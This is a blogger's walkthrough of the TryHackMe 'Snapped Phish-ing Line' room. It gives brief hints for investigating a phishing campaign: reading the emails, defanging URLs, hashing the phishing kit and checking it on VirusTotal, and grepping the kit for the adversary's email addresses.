Write-ups "Snapped Phish-ing Line" Tryhackme Chall | https://tryhackme.com/room/snappedphishingline

1. Who is the individual who received an email attachment containing a PDF?

• Just open phish-emails folder and reviews all emails :)

2. What email address was used by the adversary to send the phishing emails?

• See the "FROM" line in the mail.

3. What is the redirection URL to the phishing page for the individual Zoe Duncan? (defanged format)

• Use CyberChef to defang the URL :

You just need to see the code source of the .html phishing file and you got the URL redirection.

4. What is the URL to the .zip archive of the phishing kit? (defanged format)

• Just enumerate the website :

Use Cyberchef to defang the URL.

4.What is the SHA256 hash of the phishing kit archive?

• Download the .zip archive, open the terminal and use sha256sum on the file

5. When was the phishing kit archive first submitted? (format: YYYY-MM-DD HH:MM:SS UTC)

• Use the famous site https://www.virustotal.com and put the hash of the .zip archive and go to the good place to get the answer ;)

6. When was the phishing domain that was used to host the phishing kit archive first registered? (format: YYYY-MM-DD)

• Generally i use https://urlscan.io/ but i did not find the answer on this website. So use https://threatbook.io/

7. What was the email address of the user who submitted their password twice?

• When you enumerate the website you can see a log.txt search into this file.

8. What was the email address used by the adversary to collect compromised credentials?

• Open the .zip archive, and search the good file to get the answer. (clue is in the "Validation" folder and in .php file.

9. The adversary used other email addresses in the obtained phishing kit. What is the email address that ends in "@gmail.com"?

• Unzip the .zip archive and get a simple grep command with -r in this folder.

10. What is the hidden flag?

• When you enumerate the website you fond a flag.txt file.

Base64 ? Yeah juste decode him :)

(; noitcerid thgir eht ni srettel eht tup

Thanks Orzykf and Tryhackme for this funny chall !